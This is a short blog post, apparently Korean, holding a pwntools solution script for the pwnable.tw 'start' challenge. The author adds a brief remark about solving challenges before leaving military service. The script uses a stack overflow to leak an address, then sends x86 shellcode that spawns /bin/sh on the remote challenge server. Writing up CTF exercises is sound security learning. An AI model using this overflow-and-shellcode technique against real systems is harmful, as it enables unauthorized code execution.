from pwn import *
context.lo_level = "debug"
p = remote("chall.pwnable.tw", 10000)
#p = process("./start")
ret = 0x0804809c
main = 0x08048087
leak = b"A" * 0x14
leak += p32(main)
#leak += p32(ret)
p.recvuntil(b":")
p.send(leak)
sleep(0.1)
shell_addr = u32(p.recv(4))
log.info("shell code addr: " + hex(shell_addr))
shell = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
payload = b"A" * 0x14
payload += p32(shell_addr + 0x14)
payload += shell
sleep(1)
p.send(payload)
p.interactive()
전역도 2달인가 남아서 복학하면 워겜은 많이 안할것 같아서 전역하기 전까지 tw 열심히(?) 풀어볼까합니다
'pwn > pwnable.tw' 카테고리의 다른 글
| [pwnable.tw] hacknote (1) | 2024.01.08 |
|---|---|
| [pwnable.tw] dubble sort (1) | 2024.01.08 |
| [pwnable.tw] 3x17 (1) | 2024.01.07 |
| [pwnable.tw] calc (1) | 2024.01.07 |
| [pwnablw.tw] orw (0) | 2024.01.04 |